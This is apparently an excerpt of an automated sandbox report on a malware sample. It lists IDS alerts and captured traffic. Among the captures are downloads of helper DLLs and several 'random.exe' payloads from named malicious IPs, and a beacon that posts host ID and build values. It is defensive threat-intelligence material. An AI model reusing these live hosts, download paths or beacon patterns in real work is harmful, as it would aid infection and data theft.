2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="hwid"B3664E8882872556134559------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="build"stok------EHCGIJDHDGDBGDGCGCFH--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49763 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49798 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49859 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49881 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49900 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49923 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49924 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49930 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49938 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49945 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49968 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49979 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49992 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49987 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50029 -> 104.21.16.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0051E0C0 recv,recv,recv,recv, 14_2_0051E0C0
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_off equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_off equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*ad*--panel-banner-item-update-supported-bgcoloraddons-search-detection@mozilla.comresource://builtin-addons/search-detection/resource://search-extensions/google/*://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etpresource://search-extensions/amazondotcom/amazondotcom%40search.mozilla.org:1.6resource://search-extensions/wikipedia/blocklisted:FEATURE_FAILURE_PARSE_DRIVER equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3276641087.00000132BB450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB4D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
